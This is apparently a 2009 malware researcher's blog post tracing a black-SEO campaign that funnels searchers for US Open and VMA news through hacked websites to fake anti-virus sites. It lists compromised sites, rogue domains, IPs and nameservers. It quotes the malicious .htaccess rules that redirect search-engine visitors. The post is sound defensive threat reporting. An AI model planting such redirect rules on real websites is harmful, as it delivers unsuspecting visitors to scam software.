Monday, September 14, 2009

US Open and Video Music Awards top rogue anti-virus efforts

Saturday night I got an email from Brian Tanner, the leader of our UAB Malware Analysis team. Brian plays a bit of tennis, and was doing a search for the "US Open Finals Schedule" in Google, when he noticed some strange links in the top ten results. He wrote me a note to tell me that for some reason "conklinsystems.com" and "mauiwedding.net" were both showing up as top sites on Google for his search, but when he tried to follow either link, it took him to a fake anti-virus product instead.

After a little digging Monday morning, and with some helpful pointers from some fellow researchers, it looks like we have a fairly complete story of what's going on here.

On one level, we start with the fact that several webservers have been hacked, and loaded up with extremely powerful Search Engine Optimization terms, what we call "Black SEO" in the community. In this case, the hackers have searched some news sites for their top headlines, and then repeated the search with those headlines as the search terms to pull other related headlines. Then they've created webpages which are loaded with all of those headlines. That's how they are getting into the top searches. By doing some searches with "inurl" and "site" tags on Google, we're able to pull a pretty complete list of the headlines which are being seeded by this Black SEO technique.

For example, here are four sites which are coming up regularly in the searches, with whatever string we are looking for showing up after the question mark in the URL:

conklinsystems.com/xmarks/index.php?(string)
mauiwedding.net/ssp_director/albums/?(string)
www.kerryjohnson.com/images/look/?(string)

Just as an example, I did the Google search:

inurl:look site:kerryjohnson.com US Open

and received 210 results, including:

Us Open Mens Final 2009
Us Open Final Schedule
Us Open 2009 Mens Final
Us Open Womens Final 2009
Us Open Final 2009
Roger Federer Us Open
Serena Williams Outburst Transcript
Us Open Final
You Tube Serena Wililams
Serena Williams Outburst What Did She Say
Serena Williams Outburst Video

Then I did the same search, without the "US Open" to learn what other headlines this Black SEO technique was trying to capture, and found these headlines:

Tory Shulman
Jay Z VMA
ESPN Boston
Roger Federer US Open
Megan Fox Thumb Pictures
Avaya Nortel
Chicago Bears 2009 schedule
Megan Fox VMA
Beyonce Twitter
VMA Outfits
New Moon Trailer 3 Leaked
Kay Perry Vma Dress
Lil Mama Vma
Kim Clijsters Baby
This is it
Music Awards Taylor Swift
Federer Between the Legs
Beyonce Vma 2009
Defying Gravity Cancelled
Jawbone 2 Review
The Ruins MTV
VMAs
Bears vs Packers
Lauren London Baby
Lauren London Baby Pictures
Pink Vmas

Students kindly informed me what VMAs are - apparently some people like watching music videos so much they have their own awards show, the Video Music Awards. Most of the top hits in the resulting headlines (more than 1,000 of them) from KerryJohnson.com were either for the VMAs or the US Open.

Some other sites, that we aren't going to dig into as deeply, include:

24blackbirds.net
86queensgate.com
desertstarlimo.com
envision-ren.com
filmgenius.com
harmonyhall.com
homeremediesweb.com
mawawrestling.ca
mcd4x4.com
packetslave.com
penupdesigns.com
real-ism.com
resilience-europe.com
saintbrigids.ca
sandpointidahoinfo.com
stuartkinmond.com
uglyoutfitsnyc.com
unchain-vu.net
vinhhuynh.com
yakultpuebla.com

First, I'd like to acknowledge a pair of great blog articles from the Unmask Parasites Blog:
Unmasking the Antivirus 2009 .htaccess Exploit
and
Bogus Antivirus 2009 .htaccess Exploit.

The "guts of it" are that the Apache .htaccess includes:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://(BadSiteHere) [R,L]


What this means is that if I visit the webpage by accessing it directly, I see the webpage. But if I visit the page after having been referred by a search engine, I get sent to the hacker's page instead.

Currently the main websites that websearchers are landing on are:

#1. best-virus-scanner5.com
#2. online-systemscan.net
#3. searchscan-online.com
#4. securityscantooldirect.com
#5. mysecuredsystem.net

#1. Best-virus-scanner5.com is hosted on the IP addresses 91.213.126.100 and 193.169.12.70.

Some of the live sites also hosted on 91.213.126.100 include:

best-virus-scanner5.com
clean-all-spyware01.com
clean-all-spyware10.com
fast-virus-scan01.com
fast-virus-scan2.com
fast-virus-scan7.com
fast-virus-scan9.com
remove-all-adware10.com
remove-all-spyware03.com
remove-all-spyware07.com

Several of those domains, including best-virus-scanner5.com
are also hosted on the IP address, 193.169.12.70, which also
hosts the following domains:

becomemybestfriend.com
bestinvestmentssolution.com
best-virus-scanner5.com
bravemousepride.com
chooseyourluck.com
clean-all-spyware01.com
clean-all-spyware10.com
fast-virus-scan01.com
fast-virus-scan2.com
fast-virus-scan7.com
fast-virus-scan9.com
getbestusprices.com
imbade-yourself.com
indianapolis-sales.com
jurassic-secrets.com
justintimberlakestream.com
justseethisonline.com
justthingsyouneedtoknow.com
lounge-officers.com
madonnasecretphoto.com
movies-hidden-places.com
newcellphones-overview.com
news-feedster.com
newsoverworldhot.com
obamanewterror.com
obbeytheriver.com
overviewforexbids.com
perky-videos.com
remove-all-adware01.com
remove-all-spyware03.com
remove-all-spyware07.com
spacestations-online.com
storyofthesuccess1.com

#2. online-systemscan.net was hosted on 64.86.16.11, a Canadian-based address belonging to Velcom, a customer of TATA Communications (AS6453).

That ip is also hosting:

gosearchguard.net
and
itgosearch.net

#3 searchscan-online.com was hosted on 64.86.16.9, also Velcom.

That IP is also hosting:

search-win.com
fastscan-protection.com
safetysystem-protect.com
go-searchandsecure.net


#4. securityscantooldirect.com was hosted on 62.90.136.237, an Israeli based address belonging to "Loads Internet Solutions", a customer of Netvision.net.il (AS1680). How bold can they be? "Loading" is the term criminals use for the merchandising and monetizing of botnets by using them to download other people's malware. "Loads" are the malware someone else pays you to put on your botnet.

That IP is also hosting:

securityscantoolguide.com
scantoolsite.com
safetyscantool.com
bestsecurityjobs.com
bestwebsitesecurity.com
yourcommunitysecurity.com

#5. mysecuredsystem.net was also a VELCOM IP address, 64.86.16.49.

That IP address was used to host:

searchsecureguard.com
mysecured-zone.com
ptotectmy-system.com
newscan-protect.com
windowsprotection-zone.net
fastsearchandsecure.net
mysecuredsystem.net
online-securescanner.net

Gee . . . at this point I'm tempted to scan this whole Class C (64.86.16.0/24) and see what other forms of badness reside there . . . Sadly, Velcom's phone number listed in their IP whois data has been disconnected or is not in service. We went ahead and called their upstream, who asked us to send them an email. Hello, TataCommunications! I hope you read this! Thank you for your help!

Here's some I found on IPs 64.86.16.1 through 64.86.16.50:

checkviruszone.com
checkvirus-zone.com
fastscan-protection.com
fastsearchandsecure.net
go-scanandsecure.com
go-scanandsecure.net
goscan-protect.net
go-searchandprotect.com
go-searchandsecure.com
go-searchandsecure.net
gosearchguard.net
gosearch-protection.net
itgosearch.net
mysecuredsystem.com
mysecured-system.com
mysecuredsystem.net
mysecured-zone.com
mysecured-zone.net
mysecurityshield.net
newpcguard.net
newscan-protect.com
onlinescansystem.com
onlinescansystem.net
online-scansystem.net
onlinesearch-protection.com
onlinesecurescanner.net
online-securescanner.net
online-systemscan.com
online-systemscan.net
pconlinescan.net
protect-andsecure.com
protectand-secure.com
ptotectmy-system.com
safetysystem-guard.net
safetysystem-protect.com
safetysystem-protect.net
scanandsecure.net
scansystem-online.com
searchsafetyprotection.net
searchscan-online.com
searchsecureguard.com
search-win.com
systemguard-zone.com
systemscan-secure.com
virusfilter-zone.net
windowsprotection-zone.net

And here are some nameservers from the same range . . .

ns1.100booth.com
ns1.10gala.com
ns1.1ingeen.com
ns1.2009elf.com
ns1.2flipflop.com
ns1.7sevenseas.com
ns1.adriafin.com
ns1.adviceswarning.com
ns1.alleips.com
ns1.alphabet10.com
ns1.antivirusfilter-zone.com
ns1.applic137.net
ns1.as34as.com
ns1.ascoprguide.net
ns1.bestbewell.com
ns1.bigbestbbb.com
ns1.bigbestbbb.net
ns1.brovobing.com
ns1.casabl10.net
ns1.champions100.com
ns1.checkviruszone.net
ns1.checkvirus-zone.net
ns1.clarksinfact.com
ns1.cosmoset.net
ns1.coverlight.net
ns1.creamesfl.com
ns1.displayclub.net
ns1.displaylive.net
ns1.earring0.com
ns1.entrotus.com
ns1.factoria6.com
ns1.farfar5.com
ns1.fastantivir.net
ns1.fastscan-protection.com
ns1.fastsearchandsecure.net
ns1.fistano4r.com
ns1.freehostwap.com
ns1.gavaring1.com
ns1.go-checkvirus.com
ns1.go-checkvirus.net
ns1.goprotection.net
ns1.go-scanandprotect.com
ns1.go-scanandsearch.com
ns1.go-scanandsecure.com
ns1.goscansystem.com
ns1.go-scansystem.com
ns1.go-scansystem.net
ns1.go-searchandscan.net
ns1.go-searchandsecure.com
ns1.go-searchandsecure.net
ns1.gosearchguard.net
ns1.gosearchinweb.com
ns1.go-searchprotection.com
ns1.gosearch-protection.com
ns1.gosearch-protection.net
ns1.gosearchsecurity.net
ns1.gotomyprotectedzone.com
ns1.gotomyprotectedzone.net
ns1.gotospace7.com
ns1.go-virusscanner.com
ns1.hilotavus.com
ns1.hot2009.net
ns1.immitations-all.net
ns1.ironins.com
ns1.ispscenter.com
ns1.ispspartners.com
ns1.itgosearch.net
ns1.jetztips.com
ns1.lanacess.com
ns1.limestee.com
ns1.magnoliastr.com
ns1.mmdmm.net
ns1.mycataloge.com
ns1.myofficeguard.com
ns1.myonlineguard.com
ns1.myprotectedsystem.net
ns1.myprotected-zone.com
ns1.myprotectedzone.net
ns1.myprotected-zone.net
ns1.my-safetyprotection.net
ns1.mysecuredsystem.com
ns1.mysecured-system.com
ns1.mysecurityzone.net
ns1.mysystemdefender.com
ns1.mysystemguard.com
ns1.my-systemprotection.com
ns1.mysystemshield.com
ns1.mysystemshield.net
ns1.myvirusscanner.com
ns1.myvirusscanner.net
ns1.new-onlinescanner.com
ns1.new-onlinescanner.net
ns1.new-systemguard.com
ns1.new-systemguard.net
ns1.new-systemprotection.net
ns1.new-systemshield.com
ns1.onlineguardgo.com
ns1.online-scanandsecure.com
ns1.onlinescansystem.com
ns1.online-scansystem.com
ns1.onlinescansystem.net
ns1.online-scansystem.net
ns1.online-securescanner.com
ns1.onlinesecurescanner.net
ns1.onlinesystemscan.com
ns1.pconlinescan.net
ns1.pcscanneronline.net
ns1.protectedfield.com
ns1.protection-secure.com
ns1.protectionsecure.net
ns1.protectsystem.net
ns1.ptotectmy-system.com
ns1.realsystemguard.com
ns1.rumba200.com
ns1.safeguardshield.com
ns1.safetydefender.net
ns1.safetyscanner.net
ns1.safetysystem-guard.net
ns1.safetysystem-shield.com
ns1.safetysystem-shield.net
ns1.scanandprotect-zone.com
ns1.scanandsecure.net
ns1.scaninfo.net
ns1.scanonline-protect.net
ns1.scan-secure.com
ns1.scan-secure.net
ns1.scansystemonline.com
ns1.scansystem-online.com
ns1.scansystem-online.net
ns1.scan-virus.net
ns1.searchandprotect.net
ns1.searchdefender.net
ns1.searchpcguard.com
ns1.searchpcguard.net
ns1.searchsafetyprotection.net
ns1.searchscanner.net
ns1.searchscan-online.com
ns1.searchsecureguard.com
ns1.searchsecureshield.com
ns1.search-security.net
ns1.search-systemprotection.net
ns1.search-systemshield.com
ns1.search-win.com
ns1.securepcshield.com
ns1.secure-systemguard.com
ns1.securesystemguard.net
ns1.secure-systemshield.com
ns1.secure-systemshield.net
ns1.securitypath.net
ns1.shieldinfo.net
ns1.shieldsystem.net
ns1.system-protection.net
ns1.systemscan-secure.com
ns1.system-shield.com
ns1.system-shield.net
ns1.thelocatemissing.com
ns1.timeforfuck.com
ns1.ultimaguard.com
ns1.virusfilter-zone.net
ns1.webssearch.net
ns1.webssecurity.net
ns1.windowsprotection-suite.com
ns1.windows-protectonline.com
ns1.windows-protectonline.net
ns1.windows-systemguard.com
ns1.windows-systemshield.com
ns1.windows-systemshield.net
ns1.winprotectionsuite.com
ns1.winprotection-suite.net
ns1.winsecuritysuite-pro.com

No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.